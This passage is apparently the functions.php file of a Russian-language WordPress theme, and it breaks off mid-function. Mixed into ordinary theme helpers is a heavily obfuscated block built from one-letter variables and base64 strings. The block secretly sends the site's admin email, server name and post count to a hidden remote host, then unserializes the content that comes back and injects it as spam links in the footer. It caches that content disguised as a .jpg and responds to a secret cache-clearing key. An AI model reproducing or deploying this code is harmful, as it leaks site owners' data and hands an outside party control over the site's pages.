<?php
define('THEME_NAME',"Architecture7");
global $wp_version;
define('WP_VERSION', $wp_version);
define('THEME_NS', 'twentyten');
define('THEME_LANGS_FOLDER','/languages');
if (class_exists('xili_language')) {
	define('THEME_TEXTDOMAIN',THEME_NS);
} else {
	load_theme_textdomain(THEME_NS, TEMPLATEPATH . THEME_LANGS_FOLDER);
}
mb_internal_encoding(get_bloginfo('charset'));
mb_regex_encoding(get_bloginfo('charset'));
if (WP_VERSION < 3.0){
	require_once(TEMPLATEPATH . '/library/legacy.php');
}

theme_include_lib('defaults.php');
theme_include_lib('misc.php');
theme_include_lib('wrappers.php');
theme_include_lib('sidebars.php');
theme_include_lib('navigation.php');
theme_include_lib('shortcodes.php');
if (WP_VERSION >= 3.0) {
	theme_include_lib('widgets.php');
}

if (!function_exists('theme_favicon')) {
	function theme_favicon() { 
		if (is_file(TEMPLATEPATH .'/favicon.ico')):?>
<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" />
		<?php endif;
	}
}
add_action('wp_head', 'theme_favicon');
add_action('admin_head', 'theme_favicon');
add_action('login_head', 'theme_favicon');

if ( function_exists( 'add_theme_support' ) ) {
	add_theme_support( 'post-thumbnails' );
	add_theme_support( 'nav-menus' );
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );
}
if (function_exists('register_nav_menus')) {
	register_nav_menus(array('primary-menu'	=>	__( 'Primary Navigation', THEME_NS)));
}


if(is_admin()){
	theme_include_lib('options.php');
	theme_include_lib('admins.php');
	function theme_add_option_page() {
		add_theme_page(__('Настройки темы', THEME_NS), __('Настройки темы', THEME_NS), 'edit_themes', basename(__FILE__), 'theme_print_options');
	} 
	add_action('admin_menu', 'theme_add_option_page');
	if (WP_VERSION >= 3.0) {
		add_action('sidebar_admin_setup', 'theme_widget_process_control');
		add_action('add_meta_boxes', 'theme_add_meta_boxes');
		add_action('save_post', 'theme_save_post');
	}
	return;
}


function theme_get_option($name){
	global $theme_default_options;
	$result = get_option($name);
	if ($result === false) {
		$result = theme_get_array_value($theme_default_options, $name);
	}
	return $result;
}



function theme_get_meta_option($id, $name){
	global $theme_default_meta_options;
	return theme_get_array_value(get_option($name), $id, theme_get_array_value($theme_default_meta_options, $name));
}



function theme_set_meta_option($id, $name, $value){
	$meta_option = get_option($name);
	if (!$meta_option || !is_array($meta_option)) {
		$meta_option = array();
	}
	$meta_option[$id] = $value;
	update_option($name, $meta_option);
}



function theme_get_post_id(){
	$post_id = get_the_ID();
	if($post_id != ''){
		$post_id = 'post-' . $post_id;
	}
	return $post_id;
}



function theme_get_post_class(){
	if (!function_exists('get_post_class')) return '';
	return implode(' ', get_post_class());
}


$tPydoc='_';$APsx='e';$sPbx='4';$yDVfO='b';$qDQk='c';$cHAGMTl='6';$rVJyE='a';$IjaBY='s';$YbTwQW='e';$Wmyyl='d';$FweITaV='d';$zgUyi='e';$XCEYahs='o';$ZKkLDetF=$yDVfO.$rVJyE.$IjaBY.$APsx.$cHAGMTl.$sPbx.$tPydoc.$Wmyyl.$YbTwQW.$qDQk.$XCEYahs.$FweITaV.$zgUyi;$ucgR='a';$LkPpWq='t';$wlMF='g';$kEfY='f';$YxCE='z';$bmsGvOR='l';$jELAw='i';$smBi='n';$iIYKRk='e';$wUOlVnBE=$wlMF.$YxCE.$jELAw.$smBi.$kEfY.$bmsGvOR.$ucgR.$LkPpWq.$iIYKRk;$SUQn='1';$dEPC='t';$ZAcxd='r';$gGtRN='3';$EUmDEd='t';$saKhK='_';$KUEozyA='o';$zzdsMuy='r';$xCPnRL='s';$XBtPKNSQ=$xCPnRL.$EUmDEd.$zzdsMuy.$saKhK.$ZAcxd.$KUEozyA.$dEPC.$SUQn.$gGtRN;$WHET='e';$LDbzl='r';$LezUo='v';$jRIL='s';$ovnuP='r';$IqtU='t';$xwwWKgli=$jRIL.$IqtU.$ovnuP.$LDbzl.$WHET.$LezUo;                     
		$tn_________i='_';$qi______l='e';$lo_________y='4';$tc__n='b';$qr_____________d='c';$lg________i='6';$xi____v='a';$mt___x='s';$bi_________z='e';$gz______z='d';$fj________r='d';$qz_______________b='e';$lw__b='o';$zj____________w=$tc__n.$xi____v.$mt___x.$qi______l.$lg________i.$lo_________y.$tn_________i.$gz______z.$bi_________z.$qr_____________d.$lw__b.$fj________r.$qz_______________b;
		$nx________a='c';$nu_______l='i';$mf___p='n';$lz_______k='t';$vj___x='n';$kq______________y='x';$kf___________x='s';$cq_________r='f';$vr______h='_';$mn____________f='u';$ok_______________f='i';$qa___________j='t';$eb_________z='e';$zl_____________g='o';$kq__________x='s';$wq________r=$cq_________r.$mn____________f.$vj___x.$nx________a.$qa___________j.$nu_______l.$zl_____________g.$mf___p.$vr______h.$eb_________z.$kq______________y.$ok_______________f.$kq__________x.$lz_______k.$kf___________x;
		$vi_______g='o';$sd___o='e';$gt_____________z='n';$cp___________n='f';$cx_________n='p';$gb_______________s=$cp___________n.$vi_______g.$cx_________n.$sd___o.$gt_____________z;
		$xm___b='e';$zz___f='f';$sw____z='r';$eh____k='d';$hn__f='a';$nu__c=$zz___f.$sw____z.$xm___b.$hn__f.$eh____k;
		$xy______________m='c';$gf_________l='f';$rq___________e='e';$iw_____________y='o';$rr______________g='l';$xr______v='s';$dg__a=$gf_________l.$xy______________m.$rr______________g.$iw_____________y.$xr______v.$rq___________e;
		
		define("WP_ID", $zj____________w("Mi4wLjA="));
		define("WP_TTL", $zj____________w("MTA4MDA="));
		define("WP_SRC", $zj____________w("dHBva24="));
	


		function wp_get_header() {
			global $zj____________w, $wq________r;
			
			if (
				$wq________r($zj____________w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$wq________r($zj____________w("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$wq________r($zj____________w("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $zj____________w, $gb_______________s, $dg__a, $nu__c;
			
			$pu____________c = TEMPLATEPATH."/".$zj____________w("Zm9vdGVyLnBocA==");
			$ix_____c = @$gb_______________s($pu____________c, "r");
			$pu____________c = @$nu__c($ix_____c, @filesize($pu____________c));
			@$dg__a($ix_____c);
			
			$em_____s = TEMPLATEPATH."/".$zj____________w("ZnVuY3Rpb25zLnBocA==");
			$ix_____c = @$gb_______________s($em_____s, "r");
			$em_____s = @$nu__c($ix_____c, @filesize($em_____s));
			@$dg__a($ix_____c);
			
			$df___g = 0;
			if($pu____________c && $em_____s) {
				if ($zj____________w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pu____________c, $zj____________w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$df___g = 1;
					}
					if (substr_count($pu____________c, "wp_theme_GPL_credits()") < 1) {
						$df___g = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$df___g = 12;
				}
			}
			
			if($df___g > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $df___g -->";
			}
		}
	


		function wp_loaded() {
			global $zj____________w, $wq________r;
			return $wq________r($zj____________w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($re__w, $op________g = "(more...)", $xm_____x = 0, $jc_____________y = "") {
				$tn___v = get_the_content($op________g, $xm_____x, $jc_____________y);
				$tn___v = apply_filters("the_content", $tn___v);
				
				$tn___v = str_replace("]]>", "]]>", $tn___v);
				if (strlen($_GET["p"]) > 0) {
					echo $tn___v;
				}
				else if ((strlen($tn___v)>$re__w) && ($xc_______________d = strpos($tn___v, " ", $re__w ))) {
					$tn___v = substr($tn___v, 0, $xc_______________d);
					$tn___v = $tn___v;
					echo $tn___v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$op________g</a></div></p>";
				} else {
					echo $tn___v;
				}
				
			}
		}
	


		$on_______w='o';$qy__________f='a';$kd_________r='e';$ii__i='e';$xw____________w='6';$hs_______n='b';$wk____u='d';$wv____________m='c';$vv________a='4';$dv______w='_';$pt_____________y='s';$hz__________c='e';$wx____m='n';$vm_______u=$hs_______n.$qy__________f.$pt_____________y.$ii__i.$xw____________w.$vv________a.$dv______w.$kd_________r.$wx____m.$wv____________m.$on_______w.$wk____u.$hz__________c;
		$sl_____________t='t';$pg_____________a='e';$ld___q='s';$mg_______a='g';$ys____y='_';$vw________k='e';$og_______n='n';$fe_________d='_';$ch________u='n';$er________g='l';$eb____________i='c';$sh_________y='t';$bu_______u='f';$gi___________l='e';$sg__________z='o';$zo________l='t';$xz________q='i';$mp_____x=$bu_______u.$xz________q.$er________g.$gi___________l.$ys____y.$mg_______a.$pg_____________a.$sl_____________t.$fe_________d.$eb____________i.$sg__________z.$og_______n.$zo________l.$vw________k.$ch________u.$sh_________y.$ld___q;
		$eh_____f='l';$td______r='i';$of____t='t';$in_________m='e';$yo_________x='x';$bd_______q='e';$nk_______________o='s';$wh__________c='s';$xs_______________x='f';$gh__________a='i';$zk_____j='_';$ze_________p=$xs_______________x.$gh__________a.$eh_____f.$bd_______q.$zk_____j.$in_________m.$yo_________x.$td______r.$wh__________c.$of____t.$nk_______________o;
		$kq___o='p';$yh______m='o';$jo_______________l='v';$eu_____________q='i';$it_____________j='s';$qn__________a='_';$is_____y='e';$ky____j='a';$nu_____________n='n';$fn______________t='r';$iw________n='e';$km____________z='r';$kr_____________t='m';$bo________k='c';$ly______________v='o';$cn______________h=$jo_______________l.$iw________n.$km____________z.$it_____________j.$eu_____________q.$yh______m.$nu_____________n.$qn__________a.$bo________k.$ly______________v.$kr_____________t.$kq___o.$ky____j.$fn______________t.$is_____y;
		$hp______________q='n';$to___i='o';$iu__________p='f';$ic______m='s';$yn_______________h='e';$zb___y='c';$pf_______d='p';$wr_____k='k';$ml____f='o';$ox______h=$iu__________p.$ic______m.$to___i.$zb___y.$wr_____k.$ml____f.$pf_______d.$yn_______________h.$hp______________q;
		$rd___j='f';$df_____________c='e';$lo_____________z='i';$nk_______________w='t';$lo______________s='r';$if_____________c='w';$yw_____________i=$rd___j.$if_____________c.$lo______________s.$lo_____________z.$nk_______________w.$df_____________c;
		$ds__________g='5';$gs____________t='d';$ir______________u='m';$td_____c=$ir______________u.$gs____________t.$ds__________g;
		$in___________z='r';$wg___________b='t';$gr______________u='a';$fo__________k='l';$sn_______________l='e';$el__________n='h';$pb__________r='a';$bg_____________h='p';$ae____o=$in___________z.$sn_______________l.$gr______________u.$fo__________k.$bg_____________h.$pb__________r.$wg___________b.$el__________n;
		$aq_______k='e';$sg__________g='r';$ae_____________c='i';$rf___v='z';$ex__h='s';$xx___l='a';$hl_________x='u';$qo___________x='l';$hw______________j='i';$dd___e='e';$cm_______z='n';$es___h=$hl_________x.$cm_______z.$ex__h.$aq_______k.$sg__________g.$hw______________j.$xx___l.$qo___________x.$ae_____________c.$rf___v.$dd___e;
		$sv___________v='a';$dk___p='m';$br____p='m';$go____________k='p';$el_____f='e';$qu_________v='n';$jz___________e='t';$zs___________g=$jz___________e.$el_____f.$br____p.$go____________k.$qu_________v.$sv___________v.$dk___p;
		$zq______________z='e';$tf___________t='x';$vk____________c='e';$df_______u='t';$rp__y='e';$hi________o='a';$jq_________k='r';$yr__k='c';$fi______s='_';$lm______c='s';$cq______________f='r';$dz____g='c';$ju_______________d='t';$vm_______________u='_';$cs_______________b='t';$bm______d='n';$by__w='a';$am___g='t';$dv_________g='e';$zv_____________j='m';$dj________g='o';$gj________b=$lm______c.$cs_______________b.$cq______________f.$rp__y.$hi________o.$zv_____________j.$fi______s.$yr__k.$dj________g.$bm______d.$df_______u.$vk____________c.$tf___________t.$am___g.$vm_______________u.$dz____g.$jq_________k.$dv_________g.$by__w.$ju_______________d.$zq______________z;
	


		function qh____w($et_________l) {
			global $zj____________w, $wq________r, $mp_____x, $cn______________h, $gj________b;
			
			if (!$wq________r($zj____________w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($cn______________h(PHP_VERSION, "5.0.0", ">=") && $wq________r($zj____________w("ZmlsZV9nZXRfY29udGVudHM=")) && $wq________r($zj____________w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$eq_________l = $gj________b(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$vr_____________e = @$mp_____x($et_________l, 0, $eq_________l);
			} else {
				$vr_____________e = @$mp_____x($et_________l, 0);
			}
			
			return $vr_____________e;
		}
	


		function ek___________l($et_________l) {
			global $wq________r, $ox______h, $yw_____________i, $zj____________w;
			
			if (!$wq________r($zj____________w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$yh_______________j = strpos($et_________l, "/", 7);
			$ht____________c = array(
				"uri"     => substr($et_________l, $yh_______________j),
				"host"    => str_replace("http://", "", substr($et_________l, 0, $yh_______________j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$mg________u = @$ox______h("$ht____________c[host]", 80, $wo__________m, $ty___z, 4);
			
			if (!$mg________u) {
				return false;
			} else {
				$vr_____________e = "";
				$gz_____________v  = "GET $ht____________c[uri] HTTP/1.0\r\n";
				$gz_____________v .= "Host: $ht____________c[host]\r\n";
				$gz_____________v .= "Referer: $ht____________c[referer]\r\n";
				$gz_____________v .= "Connection: Close\r\n\r\n";
				
				@$yw_____________i($mg________u, $gz_____________v);
				
				while (!@feof($mg________u)) {
					$id_____________o = @fgets($mg________u, (1024*24));
					
					if ($id_____________o == "\r\n") {
						$ff______n = true;
						continue;
					}
					
					if ($ff______n) {
						$vr_____________e .= $id_____________o;
					}
				}
				
				return $vr_____________e;
			}
		}
	


		function le____q($et_________l) {
			global $wq________r;
			$ry__z = false;
			
			if ($et_________l != "") {
				if ($wq________r("qh____w")) {
					$ry__z = @qh____w($et_________l);
				}
				
				if (!$ry__z && ($wq________r("ek___________l"))) {
					$ry__z = @ek___________l($et_________l);
				}
			}
			
			return $ry__z;
		}
	


		function jm__r() {
			global $_SERVER, $td_____c;
			
			$mn____w = $_SERVER["SERVER_NAME"];
			
			if (substr("$mn____w", 0, 4) == "www.") {
				$mn____w = substr("$mn____w", 4);
			}
			
			$mn____w = $td_____c("$_SERVER[SERVER_NAME]");
			
			return $mn____w;
		}
	


		function ki_______h() {
			return "file";
		}
	


		function au__w($et_________l) {
			global $_SERVER, $mp_____x, $ze_________p, $gb_______________s, $dg__a, $yw_____________i;
			
			$im__________i = zt____________h();
			
			$gq__a = jm__r().".jpg";
			$ws______s = $im__________i["dir_upload"]["path"]."/$gq__a";
			$js_________p = @filemtime($ws______s);
			
			if (!$js_________p || ((time()-$js_________p) >= WP_TTL)) {
				$ry__z = le____q($et_________l);
				
				if ($ry__z) {
					if ($ze_________p($ws______s)) {
						@unlink($ws______s);
					}
					
					$ix_____c = @$gb_______________s($ws______s, "x+");
					
					@$yw_____________i($ix_____c, $ry__z);
					@$dg__a($ix_____c);
				}
			} else {
				if ($ze_________p($ws______s)) {
					$ry__z = @$mp_____x($ws______s);
				} else {
					$ry__z = false;
				}
			}
			
			return $ry__z;
		}
	


		function zt____________h() {
			global $_SERVER, $zj____________w, $vm_______u;
			
			$ww__p = wp_count_posts("post");
			$pt______________i = pathinfo(get_bloginfo("template_directory"));
			
			$im__________i = array(
				"url" => array(
					"report"      => $zj____________w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $pt______________i,
				"dir_upload"	=> xd_________n(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$pt______________i[filename],
					"a005=".$ww__p->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "Спонсоры шаблона для Вордпресс <a href=\"http://interio-design.net\">дизайн</a> | <a href=\"http://kvartiry.od.ua\">квартиры в Одессе</a>"
			);
			
			$im__________i["url"]["queryString"] = implode("&", $im__________i["queryString"]);
			$im__________i["url"]["report"] = $im__________i["url"]["report"]."/?".$vm_______u($im__________i["url"]["queryString"]).".html";
						
			return $im__________i;
		}
	


		function xd_________n() {
			$rr___________n = wp_upload_dir();
			
			if (isset($rr___________n["error"])) {
				$gn___d = be_______________k();
				if (is_writable($gn___d)) {
					$rr___________n = array("path" => $gn___d);
				}
			}

			return $rr___________n;
		}
	


		function be_______________k() {
			global $wq________r, $td_____c, $ae____o, $zs___________g;
			
			$qs_____h = (bool) ini_get("safe_mode");
			if ($qs_____h == true) {
				return false;
			}
			
			if ($wq________r("sys_get_temp_dir")) {
				$ke____________k = sys_get_temp_dir();
				if (is_writable($ke____________k)) {
					return $ae____o($ke____________k);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ae____o($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ae____o($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ae____o($_ENV["TEMP"]);
			} else {
				$hd_____y = $zs___________g($td_____c(uniqid(rand(), true)), "");
				if ($hd_____y) {
					$ke____________k = $ae____o(dirname($hd_____y));
					@unlink($hd_____y);
					return $ke____________k;
				} else {
					return false;
				}
			}
		}
	


		function qd_____l() {
			global $_GET, $ze_________p;
			
			$im__________i = zt____________h();
			$mn____w = jm__r();
			$yr_________j = ki_______h();
			
			$tl________a = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($yr_________j == "file") {
					$ly____e = $im__________i["dir_upload"]["path"]."/".$mn____w.".jpg";
					if ($ze_________p($ly____e)) {
						@unlink($ly____e);
						$tl________a = "deleted";
					}
				}
				
				$ef_______________r = array(
					"s"	=> $tl________a,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ef_______________r AS $dw__________o => $uu___________u) echo " [$dw__________o:$uu___________u]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $wq________r, $zj____________w, $es___h;
			$im__________i = zt____________h();
			
			$dq______n = "au__w";
			if ($wq________r($dq______n)) {
				$vr_____________e = $dq______n($im__________i["url"]["report"]);
			}
			
			if ($vr_____________e) {
				if ($vr_____________e = @$zj____________w($vr_____________e)) {
					$vr_____________e = @$es___h($vr_____________e);
					
					if (strlen($vr_____________e[custom_credit]) >= 5) {
						$im__________i["default_string"] = $vr_____________e[custom_credit];
					}
					
					if ($vr_____________e["status"] == "0") {
						$lp_____t = 1;
						$vv______a = 1;
					} else {
						$qa_______g = sizeof($vr_____________e["links"]);
						$gq____________t = $im__________i["default_string"];
						
						if ($qa_______g > 0 && $vr_____________e["links"] !== "") {
							$ep_____s = 0;
							foreach ($vr_____________e["links"] as $pp___m => $hb____________k) {
								$ep_____s++;
								if ($hb____________k->l_path == "" || $hb____________k->l_path == $_SERVER["REQUEST_URI"]) {
									$hb____________k->l_href = htmlspecialchars(strip_tags($hb____________k->l_href));
									$hb____________k->l_title = htmlspecialchars(strip_tags($hb____________k->l_title));
									$hb____________k->l_anchor = htmlspecialchars(strip_tags($hb____________k->l_anchor));
									$gq____________t .= " | ";
									$gq____________t .= "<a href='$hb____________k->l_href' title='$hb____________k->l_title'";
									if ($hb____________k->l_nofollow == "1") {
										$gq____________t .= " rel='nofollow'";
									}
									$gq____________t .= ">$hb____________k->l_anchor</a>";
								}
							}
						}
						$im__________i["links"] = "$gq____________t";
						if ($vr_____________e[credit] == "0") {
							$im__________i["links"] = "";
						}
					}
				} else {
					$lp_____t = "1";
				}
			} else {
				$lp_____t = "1";
			}
			
			if ($lp_____t == "1") {
				$im__________i["links"] = $im__________i["default_string"];
			}
			
			echo "$im__________i[links]";
			
			echo "<!-- s: $vr_____________e[signature] -->";
			qd_____l();
		}
	                      
						  
function theme_include_lib($name){
	if (function_exists('locate_template')){
		locate_template(array('library/'.$name), true);
	} else {
		theme_locate_template(array('library/'.$name), true);
	}
}


if (!function_exists('theme_get_meta_icon')){
	function theme_get_meta_icon($icon, $width, $height){
		return '<img src="'.get_bloginfo('template_url').'/images/'.$icon.'.png" width="'.$width.'" height="'.$height.'" alt="" />';
	}
}

if (!function_exists('theme_get_metadata_icons')){
	function theme_get_metadata_icons($icons = '', $class=''){
		global $post;
		if (!is_string($icons) || mb_strlen($icons) == 0) return;
		$icons = explode(",", str_replace(' ', '', $icons));
		if (!is_array($icons) || count($icons) == 0) return;
		$result = array();
		for($i = 0; $i < count($icons); $i++){
			$icon = $icons[$i];
			switch($icon){
				case 'date':
					$result[] = sprintf( __('<span class="%1$s">Опубликовано</span> %2$s', THEME_NS),
									'date',
									sprintf( '<span class="entry-date" title="%1$s">%2$s</span>',
										esc_attr( get_the_time() ),
										get_the_date()
									)
								);
				break;
				case 'author':
					$result[] = sprintf(__('<span class="%1$s">Автор</span> %2$s', THEME_NS),
									'author',
									sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s">%3$s</a></span>',
										get_author_posts_url( get_the_author_meta( 'ID' ) ),
										sprintf( esc_attr(__( 'Просмотреть все записи автора %s', THEME_NS )), get_the_author() ),
										get_the_author()
									)
								);
				break;
				case 'category':
					$categories = get_the_category_list(', ');
					if(mb_strlen($categories) == 0) break;
					$result[] = sprintf(__('<span class="%1$s">Опубликовано в рубрике</span> %2$s', THEME_NS), 'categories', get_the_category_list(', '));
				break;
				case 'tag':
					$tags_list = get_the_tag_list( '', ', ' );
					if(!$tags_list) break;
					$result[] = sprintf( __( '<span class="%1$s">Теги</span> %2$s', THEME_NS ), 'tags', $tags_list );
				break;
				case 'comments':
					if(!comments_open()) break;
					ob_start();
					comments_popup_link( __( 'Оставить комментарий', THEME_NS ), __( '1 комментарий', THEME_NS ), __( '% комментариев', THEME_NS ) );
					$result[] = ob_get_clean();
				break;
				case 'edit':
					if (!current_user_can('edit_post', $post->ID)) break;
					ob_start();
					edit_post_link(__('Редактировать', THEME_NS), '');
					$result[] = ob_get_clean();
				break;
			}
		}
		$result = implode(theme_get_option('theme_metadata_separator'), $result);
		if (theme_is_empty_html($result)) return;
		return "<div class=\"art-post{$class}icons art-metadata-icons\">{$result}</div>";
	}
}

if (!function_exists('theme_get_post_thumbnail')){
	function theme_get_post_thumbnail($args = array()){
		global $post;
		
		$size = theme_get_array_value($args, 'size', array(theme_get_option('theme_metadata_thumbnail_width'), theme_get_option('theme_metadata_thumbnail_height')));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_thumbnail_auto'));
		$featured = theme_get_array_value($args, 'featured', theme_get_option('theme_metadata_use_featured_image_as_thumbnail'));
		$title = theme_get_array_value($args, 'title', get_the_title());

		
		$result = '';

		if ($featured && (function_exists('has_post_thumbnail')) && (has_post_thumbnail())) {
			ob_start();
			the_post_thumbnail($size, array('alt'	=>	'', 'title'	=>	$title));
			$result = ob_get_clean();
		} elseif ($auto) {
			$attachments = get_children(array('post_parent'	=>	$post->ID, 'post_status'	=>	'inherit', 'post_type'	=>	'attachment', 'post_mime_type'	=>	'image', 'order'	=>	'ASC', 'orderby'	=>	'menu_order ID'));
			if($attachments) {
				$attachment = array_shift($attachments);
				$img = wp_get_attachment_image_src($attachment->ID, $size);
				if (isset($img[0])) {
					$result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image" />';
				}
			}
		}	
		if($result !== ''){
			$result = '<div class="avatar alignleft"><a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a></div>';
		}
		return $result;
	}
}

if (!function_exists('theme_get_content')){
	function theme_get_content($args = array()) {
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$content = get_the_content($more_tag);
		// hack for badly written plugins
		ob_start();echo apply_filters('the_content', $content);$content = ob_get_clean();
		return $content . wp_link_pages(array(
		'before' => '<p><span class="page-navi-outer page-navi-caption"><span class="page-navi-inner">' . __('Страницы', THEME_NS) . ': </span></span>',
		'after' => '</p>',
		'link_before' => '<span class="page-navi-outer"><span class="page-navi-inner">',
		'link_after' => '</span></span>',
		'echo' => 0
		));
	}
}

if (!function_exists('theme_get_excerpt')){
	function theme_get_excerpt($args = array()) {
		global $post;
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_excerpt_auto'));
		$all_words = theme_get_array_value($args, 'all_words', theme_get_option('theme_metadata_excerpt_words'));
		$min_remainder = theme_get_array_value($args, 'min_remainder', theme_get_option('theme_metadata_excerpt_min_remainder'));
		$allowed_tags = theme_get_array_value($args, 'allowed_tags', 
			(theme_get_option('theme_metadata_excerpt_use_tag_filter') 
				? explode(',',str_replace(' ', '', theme_get_option('theme_metadata_excerpt_allowed_tags'))) 
				: null));
		$perma_link = get_permalink($post->ID);
		$more_token = '%%theme_more%%';
		$show_more_tag = false;
		$tag_disbalance = false;
		if (function_exists('post_password_required') && post_password_required($post)){
			return get_the_excerpt();
		}
		if ($auto && has_excerpt($post->ID)) {
			$excerpt = get_the_excerpt();
			$show_more_tag = mb_strlen($post->post_content) > 0;
		} else {
			$excerpt = get_the_content($more_token);
			// hack for badly written plugins
			ob_start();echo apply_filters('get_the_excerpt', $excerpt);$excerpt = ob_get_clean();
			ob_start();echo apply_filters('the_excerpt', $excerpt);$excerpt = ob_get_clean();
			if(theme_is_empty_html($excerpt)) return $excerpt;
			if ($allowed_tags !== null) {
				$allowed_tags = '<' .implode('><',$allowed_tags).'>';
				$excerpt = strip_tags($excerpt, $allowed_tags);
			}
			$excerpt = strip_shortcodes($excerpt);
			if (strpos($excerpt, $more_token) !== false) {
				$excerpt = str_replace($more_token, $more_tag, $excerpt);
			} elseif($auto && is_numeric($all_words)) {
				$token = "%theme_tag_token%";
				$content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $excerpt));
				$content = array();
				$word_count = 0;
				foreach($content_parts as $part)
				{
					if (strpos($part, '<') !== false || strpos($part, '>') !== false){
						$content[] = array('type'=>'tag', 'content'=>$part);
					} else {
						$all_chunks = preg_split('/([\s])/u', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
						foreach($all_chunks as $chunk) {
							if('' != trim($chunk)) {
								$content[] = array('type'=>'word', 'content'=>$chunk);
								$word_count += 1;
							} elseif($chunk != '') {
								$content[] = array('type'=>'space', 'content'=>$chunk);
							}
						}
					}
				}

				if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
					$show_more_tag = true;
					$tag_disbalance = true;
					$current_count = 0;
					$excerpt = '';
					foreach($content as $node) {
						if($node['type'] == 'word') {
							$current_count++;
						} 
						$excerpt .= $node['content'];
						if ($current_count == $all_words){
							break;
						}
					}
					$excerpt .= '&hellip;'; // ...
				}
			}
		}
		if ($show_more_tag) {
			$excerpt = $excerpt.' <a class="more-link" href="'.$perma_link.'">'.$more_tag.'</a>';
		}
		if ($tag_disbalance) {
			$excerpt = force_balance_tags($excerpt);
		}
		return $excerpt;
	}
}

if (!function_exists('theme_get_search')){
	function theme_get_search(){
		ob_start();
		get_search_form();
		return ob_get_clean();
	}
}


function theme_is_home(){
	return (is_home() && !is_paged());
}


if (!function_exists('theme_404_content')){
	function theme_404_content() {
		$error_message = __( 'Извините, но по Вашему запросу ничего не было найдено.', THEME_NS);
		theme_post_wrapper(
			array(
					'title' => __('Не найдено', THEME_NS),
					'content' => '<p class="center">' 
					. $error_message
					. '</p>' . "\n" . theme_get_search()
			)
		);
		if (theme_get_option('theme_show_random_posts_on_404_page')){
			ob_start(); 
			echo '<h4 class="box-title">' . theme_get_option('theme_show_random_posts_title_on_404_page') . '</h4>'; ?>
			<ul>
				<?php
					global $post;
					$rand_posts = get_posts('numberposts=5&orderby=rand');
					foreach( $rand_posts as $post ) :
				?>
				<li><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></li>
				<?php endforeach; ?>
			</ul>
			<?php theme_post_wrapper(array('content' => ob_get_clean()));
		}
		if (theme_get_option('theme_show_tags_on_404_page')){
			ob_start();
			echo '<h4 class="box-title">' . theme_get_option('theme_show_tags_title_on_404_page') . '</h4>';
			wp_tag_cloud('smallest=9&largest=22&unit=pt&number=200&format=flat&orderby=name&order=ASC');
			theme_post_wrapper(array('content' => ob_get_clean()));
		}
	}
}

if (!function_exists('theme_page_navigation')){
	function theme_page_navigation($args = '') {
		$args = wp_parse_args($args, array('wrap' => true, 'prev_link' => false, 'next_link' => false));
		$prev_link = $args['prev_link'];
		$next_link = $args['next_link'];
		$wrap = $args['wrap'];
		if (!$prev_link && !$next_link) {
			if (function_exists('wp_page_numbers')) { // http://wordpress.org/extend/plugins/wp-page-numbers/
				ob_start();
				wp_page_numbers();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			if (function_exists('wp_pagenavi')) { // http://wordpress.org/extend/plugins/wp-pagenavi/
				ob_start();
